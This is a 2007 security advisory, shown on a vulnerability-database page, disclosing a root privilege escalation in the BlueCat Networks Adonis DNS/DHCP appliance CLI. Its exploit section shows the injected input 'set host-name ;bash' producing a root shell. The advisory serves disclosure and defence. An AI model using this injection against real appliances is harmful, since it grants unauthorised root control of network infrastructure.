Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TS-2007-003-0.txt

🗓️ 17 Aug 2007 00:00:00Reported by forloopType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Template Security discovered root privilege escalation in BlueCat Networks Adonis CL

Code
`Template Security Security Advisory  
-----------------------------------  
  
BlueCat Networks Adonis CLI root privilege escalation  
  
Date: 2007-08-16  
Advisory ID: TS-2007-003-0  
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/  
Revision: 0  
  
Contents  
--------  
  
Summary  
Software Version  
Details  
Impact  
Exploit  
Workarounds  
Obtaining Patched Software  
Credits  
Revision History  
  
Summary  
-------  
  
Template Security has discovered a root privilege escalation  
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance  
which allows the admin user to gain root privilege from the  
Command Line Interface (CLI).  
  
Software Version  
----------------  
  
Adonis version 5.0.2.8 was tested.  
  
Details  
-------  
  
The admin account on the Adonis DNS/DHCP appliance provides  
access to a CLI that allows an administrator to perform tasks  
such as setting the IP address, netmask, system time and system  
hostname. By entering a certain command sequence, the  
administrator is able to execute a command as root.  
  
Impact  
------  
  
Access to the admin account is the same as root access on the  
appliance.  
  
Exploit  
-------  
  
Here we use the 'set host-name' CLI command to execute a root  
shell:  
  
:adonis>set host-name ;bash  
adonis.katter.org  
root@adonis:~# id  
uid=0(root) gid=0(root) groups=0(root)  
  
NOTE: There may be other command sequences that accomplish the  
same result.  
  
Workarounds  
-----------  
  
Only provide admin account access to administrators that also  
have root account access on the appliance.  
  
Obtaining Patched Software  
--------------------------  
  
Contact the vendor.  
  
Credits  
-------  
  
forloop discovered this vulnerability while enjoying a Tuborg  
Gold. forloop is a member of Template Security.  
  
Revision History  
----------------  
  
2007-08-16: Revision 0 released  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
template securitybluecat networksadonisroot privilege escalationdns/dhcpadmin accountclivulnerabilityexploitpatchvendortuborg gold
17